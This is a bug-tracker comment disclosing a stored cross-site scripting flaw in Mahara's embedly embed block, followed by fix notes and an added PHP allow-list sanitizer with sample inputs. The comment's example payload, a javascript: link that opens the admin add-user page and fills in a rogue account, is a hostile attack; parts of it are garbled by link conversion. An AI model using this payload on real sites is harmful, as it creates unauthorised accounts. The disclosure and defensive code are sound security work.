Comment 1 for bug 1968920

Kristina Hoeppner (kris-hoeppner) wrote :

Example exploit:

<a class="embedly-card" href="javascript: {var TestFenster = http://window.open('../admin/users/add.php','TestWindow','width=800,height=800,left=100,top=50');function fill() {TestWindow.adduser.username.value='badboy';TestWindow.adduser.firstname.value='Bad';TestWindow.adduser.lastname.value='Boy';http://<email address hidden>';TestWindow.adduser.password.value='Secret+12345';https://t.co/f2YTjI3B9B();}TestWindow.addEventListener('load',fill);}">open the gate</a>

Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.

---------------------

Things to keep in mind:

- we'd probably need to allow protocol-free URLs too, e.g. allow strings starting with 'http://', 'https://', and '://'
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/blocktype/externalvideo/embed_services/embedly/embedservice.php#L61
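
An allow-list check along the lines of the points listed above, as an added example that is not part of the original comment and is not Mahara's code. The function names and sample inputs are hypothetical, and "protocol-free" is assumed here to mean the `//host/path` form.

```php
<?php
// Added example, not Mahara code; names and sample inputs are hypothetical.

// Return the URL if it may be used as an embed card href, otherwise null.
function embed_url_or_null(string $raw): ?string {
    // Browsers ignore leading/trailing whitespace and control bytes in an
    // href, so strip them before looking at the scheme.
    $url = trim($raw, " \t\n\r\0\x0B\x0C");
    // Browsers also drop tabs and newlines inside a URL; refuse any
    // remaining whitespace or control byte instead of guessing.
    if ($url === '' || preg_match('/[\x00-\x20\x7F]/', $url)) {
        return null;
    }
    // Allow-list: http://, https://, or //host/path. Every other scheme
    // (javascript:, data:, ...) fails here, whatever its letter case.
    if (!preg_match('#^(?:https?:)?//#i', $url)) {
        return null;
    }
    // Require a host so that "https://" alone is not accepted.
    $host = parse_url($url, PHP_URL_HOST);
    return (is_string($host) && $host !== '') ? $url : null;
}

// Build the anchor; escaping stops an accepted URL breaking out of the attribute.
function render_embed_card(string $raw): string {
    $url = embed_url_or_null($raw);
    if ($url === null) {
        return '';
    }
    return '<a class="embedly-card" href="'
        . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '"></a>';
}

// Constructed sample inputs.
$samples = [
    'https://example.com/video/1',
    '//example.com/video/1',
    "javascript: {var w = window.open('../admin/users/add.php');}",
    " JaVaScRiPt:void(0)",
    "java\tscript:void(0)",
    'data:text/html,hello',
    'https://example.com/"class="x',
];
foreach ($samples as $s) {
    $out = render_embed_card($s);
    echo ($out === '' ? 'REJECT ' : 'ACCEPT ') . json_encode($s) . " => $out\n";
}
```

Only the first two samples and the last one produce an anchor; in the last, the double quotes are emitted as `&quot;`, so the value stays inside the `href` attribute.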